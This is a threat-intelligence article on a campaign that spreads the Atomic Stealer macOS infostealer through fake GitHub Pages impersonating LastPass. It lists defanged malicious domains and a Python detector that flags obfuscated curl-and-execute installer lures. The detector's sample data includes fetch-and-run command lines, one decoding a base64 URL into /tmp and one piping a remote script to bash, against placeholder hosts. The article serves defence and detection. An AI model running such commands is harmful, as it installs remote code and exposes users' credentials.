A recent cyber-attack campaign has been identified, exploiting GitHub Pages to distribute the Atomic Stealer (AMOS) malware to macOS users. This operation employs advanced Search Engine Optimization (SEO) techniques to position malicious repositories prominently in search results on platforms like Google and Bing. The primary targets are individuals seeking legitimate software from reputable technology companies, financial institutions, and password management services.
Attack Methodology
The attackers have developed a multi-layered strategy:
1. Creation of Deceptive GitHub Repositories: Cybercriminals establish fraudulent GitHub repositories that mimic official software distributors. These repositories are designed to appear legitimate, often replicating the branding and content of the original software providers.
2. SEO Manipulation: By leveraging SEO techniques, these malicious repositories are elevated to the top of search engine results. This increases the likelihood of users encountering them when searching for specific applications.
3. Redirection to Malicious Sites: Upon visiting these deceptive GitHub Pages, users are presented with links such as “Install [Company] on MacBook”. Clicking these links redirects them to secondary staging sites that further the illusion of legitimacy.
Case Study: LastPass Impersonation
The LastPass Threat Intelligence, Mitigation, and Escalation (TIME) team uncovered this threat after identifying two fraudulent repositories targeting their customers. Both repositories were created by a user named modhopmduck476 on September 16, 2025.
– Redirection Process: Victims searching for LastPass were led to a GitHub Page that redirected them to a URL resembling LastPass’s official site: `hxxps://ahoastock825[.]github[.]io/.github/lastpass`. This page then forwarded users to another site: `macprograms-pro[.]com/mac-git-2-download.html`.
– Execution of Malicious Commands: The secondary site instructed users to execute a terminal command that performed a `curl` request to a base64-encoded URL. This URL resolved to `bonoud[.]com/get3/install.sh`, downloading the malicious payload, disguised as a system update, to the temporary directory.
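The command pattern described above (a base64-encoded URL decoded on the fly, fetched with `curl`, staged in the temporary directory and executed) is something a defender can look for in process-execution telemetry. The following Python is an added example for this article, not code from LastPass, GitHub or the campaign itself: it scans a list of shell command lines, decodes base64-looking tokens to recover any hidden URL, and flags the decode-then-fetch, pipe-to-shell and temp-directory staging behaviours. The sample command lines and the domains `staging.example` and `installer.example` are constructed for the example and are not real indicators.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: a URL hidden behind base64, built here so the example stays self-contained.
# The domain is a placeholder, not the campaign's real infrastructure.
_HIDDEN_URL = "https://staging.example/get3/install.sh"
_HIDDEN_B64 = base64.b64encode(_HIDDEN_URL.encode()).decode()

# Constructed process command lines, as an EDR or shell-history collector might record them.
SAMPLE_COMMANDS = [
    # Benign package install (also mentions wget, which alone must not trigger a finding)
    "brew install wget",
    # Decode a base64 URL inline, download to /tmp, make executable, run (the pattern in the article)
    f'sh -c "curl -fsSL $(echo {_HIDDEN_B64} | base64 -d) -o /tmp/update '
    f'&& chmod +x /tmp/update && /tmp/update"',
    # Remote script piped straight into the shell
    "curl -fsSL https://installer.example/setup.sh | bash",
    # Benign use of base64 for encoding, not decoding
    "base64 -i report.pdf -o report.b64",
]

# A run of 16+ base64 alphabet characters, optionally padded, not embedded in a longer token.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
# macOS base64 decodes with -D (older) or -d/--decode (newer).
DECODE = re.compile(r"base64\s+(?:-d|-D|--decode)\b")
FETCH = re.compile(r"\b(?:curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:bash|zsh|dash|sh)\b")
TMP_DIR = re.compile(r"(?:/tmp/|/private/tmp/|\$TMPDIR|/var/folders/)")
URL = re.compile(r"https?://[^\s\"'<>]+")


@dataclass
class Finding:
    command: str
    indicators: List[str] = field(default_factory=list)
    hidden_urls: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.indicators)


def decode_hidden_url(token: str) -> Optional[str]:
    """Return a URL if the token is valid base64 that decodes to printable text containing one."""
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    if not text.isprintable():
        return None
    match = URL.search(text)
    return match.group(0) if match else None


def analyze(cmd: str) -> Finding:
    """Score one command line against the installer-abuse behaviours described in the article."""
    finding = Finding(command=cmd)
    has_decode = bool(DECODE.search(cmd))
    has_fetch = bool(FETCH.search(cmd))

    for token in B64_TOKEN.findall(cmd):
        url = decode_hidden_url(token)
        if url:
            finding.hidden_urls.append(url)
    if finding.hidden_urls:
        finding.indicators.append("base64-obfuscated URL")
    if has_decode and has_fetch:
        finding.indicators.append("decode-then-fetch")
    if has_fetch and PIPE_TO_SHELL.search(cmd):
        finding.indicators.append("remote script piped to shell")
    if has_fetch and TMP_DIR.search(cmd):
        finding.indicators.append("download staged in temp dir")
    return finding


def scan(commands: List[str]) -> List[Finding]:
    """Return only the command lines that raised at least one indicator."""
    return [f for f in (analyze(c) for c in commands) if f.suspicious]


if __name__ == "__main__":
    for f in scan(SAMPLE_COMMANDS):
        print(f"SUSPICIOUS: {f.command}")
        for ind in f.indicators:
            print(f"  - {ind}")
        for url in f.hidden_urls:
            print(f"  hidden URL: {url}")
```

Note that a bare mention of `wget` or of `base64` is deliberately not enough to raise a finding; the indicators combine a fetch with a decode, a pipe into a shell, or a temp-directory write, which is what separates the installer lure from ordinary administration. Recovered hidden URLs can be fed to a blocklist or domain-reputation lookup.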
Atomic Stealer Malware Overview
Atomic Stealer, also known as AMOS, is a sophisticated information-stealing malware specifically designed for macOS environments. Active since April 2023, it possesses the capability to harvest a wide range of sensitive data, including:
– Passwords: Extracts credentials stored in browsers and system keychains.
– Browser Cookies: Collects cookies that can be used to hijack active sessions.
– Cryptocurrency Wallet Information: Targets various cryptocurrency wallets to steal funds.
– System Credentials: Gathers system-related information that can be exploited for further attacks.
Once installed, Atomic Stealer establishes persistence on the infected system and communicates with command-and-control (C2) servers to exfiltrate the stolen data.
Operational Resilience of Threat Actors
The cybercriminals behind this campaign have demonstrated significant adaptability:
– Multiple GitHub Usernames: To evade detection and takedown efforts, the attackers create multiple GitHub accounts. This distributed approach ensures the continuity of their malicious infrastructure even when individual repositories are reported and removed.
– Broader Targeting: Beyond LastPass, similar attacks have been identified targeting various technology companies and financial institutions, indicating a widespread and coordinated effort.
Recommendations for macOS Users
To mitigate the risk of such attacks, macOS users are advised to:
1. Exercise Caution with Search Results: Be wary of downloading software directly from search engine results. Always verify the authenticity of the source before proceeding.
2. Verify Repository Authenticity: Before executing terminal commands or installing applications, ensure that the repository is legitimate. Check for official documentation and cross-reference with the official website.
3. Stay Updated: Regularly update your operating system and software to benefit from the latest security patches.
4. Use Security Solutions: Employ reputable security software that can detect and prevent malware infections.
5. Educate Yourself: Stay informed about the latest cyber threats targeting macOS users. Knowledge is a crucial defense against social engineering attacks.
Conclusion
This campaign underscores the evolving tactics of cybercriminals who exploit trusted platforms like GitHub to distribute malware. By leveraging SEO techniques and creating deceptive repositories, they increase the likelihood of compromising unsuspecting users. Vigilance, verification, and adherence to cybersecurity best practices are essential in mitigating such threats.